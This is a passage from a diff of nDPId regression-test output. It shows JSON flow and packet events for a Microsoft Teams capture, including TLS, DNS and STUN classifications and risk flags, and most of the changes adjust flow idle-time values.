{"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693828,"flow_last_seen":1587041693828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693828,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1587041693828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf\/AqAEGNHL6mMNeAbvdNMkXAAAAALAC\/\/\/QFQAAAgQFtAEDAwUBAQgKMITaQwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693849,"flow_last_seen":1587041693849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693849,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} +00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 
+01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1587041694221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1587041694221,"pkt":"EBMx8Tl2KDc3AG3ICABFAABWS5cAAP8R7KfAqAEGwKgBAe2lADUAQpDJn88BAAABAAAAAAAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAQ=="} 00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2633,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694221,"flow_last_seen":1587041694221,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041694221,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1587041694234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1587041694234,"pkt":"KDc3AG3IEBMx8Tl2CABFAACixyFAADkR9tHAqAEBwKgBBgA17aUAjgAAn8+BgAABAAAAAQAAG2MtZmxpZ2h0cHJveHktZXVuby0wMS10ZWFtcwhjbG91ZGFwcANuZXQAABwAAcAoAAYAAQAAAA4AQARwcmQxDmF6dXJlZG5zLWNsb3VkwDEGbXNuaHN0CW1pY3Jvc29mdANjb20AfaP8PAAAA4QAAAEsAAk6gAAAADw="} 
00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2634,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041694234,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"c-flightproxy-euno-01-teams.cloudapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} 
-00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2637,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1587041694262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041694262,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0VplAAGwGdII0ck2IwKgBBgG77Jdw4z8APJqWp4AS\/\/+58wAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2638,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1587041694262,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041694262,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG9yfAqAEGNHJNiOyXAbs8mpancOM\/AVAQIADasgAA"} 
+00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2639,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041694219,"flow_last_seen":1587041694263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041694263,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.flightproxy.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041694611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2658,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041694571,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2665,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695278,"flow_last_seen":1587041695278,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041695278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -484,7 +484,7 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2683,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041695422,"flow_last_seen":1587041695422,"flow_idle_time":180000,"flow_min_l4_payload_len":124,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1587041695422,"l3_proto":"ip4","src_ip":"52.114.252.8","dst_ip":"192.168.1.6","src_port":3479,"dst_port":50016,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"teams.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1587041695432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695432,"pkt":"EBMx8Tl2KDc3AG3ICABFAACA0aoAAEARtpnAqAEGNHL8CMNgDZcAbO2O\/xAAYN6qKWcI9wj8AQEARCESpEKBJ1p+KLNk2I89FPmAcAAEAAAABwAgAAgAASyFFWBYSoA3AAQAAAACgDYABAAAAAEACAAUmYtT\/sgffZE\/GPjMTGRSk5h1N+2AKAAEPqesNg=="} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2688,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1587041695433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041695433,"pkt":"EBMx8Tl2KDc3AG3ICABFAACAFs8AAEARcWjAqAEGNHL8FcN0DZgAbMYz\/xAAYGUfNM4ueRX8AQEARCESpEK59F1PLtIJs2rQCYqAcAAEAAAABwAgAAgAASyKFWBYV4A3AAQAAAACgDYABAAAAAEACAAUb+d2GMvNHhGxBtT1sjJNLSVYAvSAKAAEqoFJXQ=="} 
-00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2690,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":213,"midstream":0,"thread_ts_msec":1587041695435,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
